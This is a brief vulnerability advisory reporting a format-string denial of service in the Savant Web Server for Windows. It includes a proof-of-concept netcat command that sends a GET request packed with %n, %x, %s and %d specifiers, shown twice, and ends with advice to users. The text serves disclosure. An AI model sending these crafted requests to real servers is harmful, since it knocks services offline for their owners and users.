Savant Web Server - Multiple Vulnerabilities
"Savant is a full-featured open-source / freeware web server designed to be run under any 32-bit version of Microsoft Windows (including Windows 95, 98, ME, XP, NT, and 2000). Savant was designed to be easy to use, fast, and secure."
More information at http://savant.sourceforge.net
Denial of service.
[Vulnerability #1] DoS with malformed GET requests
By sending a GET request with format string specifier character, such as %n, %d, %s, and %x to Savant Web Server, the service will crash with a dialog box popped up saying "invalid memory reference". Examining the Savant general log files reveals the service crashed at the location while attempting to read. Hence closing an infinite loop with this http service could not handle the request and crashed.
-$nc localhost 80GET /index.html/%n%n%n%x%n%n%n%n%x%n%n%n%x%n%s%n%d%n%s%d%n%x%n%s%d%x%n%s%d%n%x%n%d%n%x%n%s%d%x%n%s%d%n%x%n%d%n%x%d%n%s%d%n%s%d%n%d%x%d%n%s%d%n%s%d%n%x%d%n%d%x%s%n%s%d%n%d%s%d HTTP/1.1
GET /&%n/
-$nc localhost 80GET /index.html/%n%n%n%x%n%n%n%n%x%n%n%n%x%n%s%n%d%n%s%d%n%x%n%s%d%x%n%s%d%n%x%n%d%n%x%n%s%d%x%n%s%d%n%x%n%d%n%x%d%n%s%d%n%s%d%n%d%x%d%n%s%d%n%s%d%n%x%d%n%d%x%s%n%s%d%n%d%s%d HTTP/1.1
The same vulnerability report had also been sent to the vendor but I wasn't able to receive any acknowledgement from the vendor for a long time. So my best suggestion to Savant's users is to either disable Savant on your computer and wait for a newer release or just simply switch to another stable and secure web server.
N/A
Phuong Nguyen (ECQ)
N/A
N/A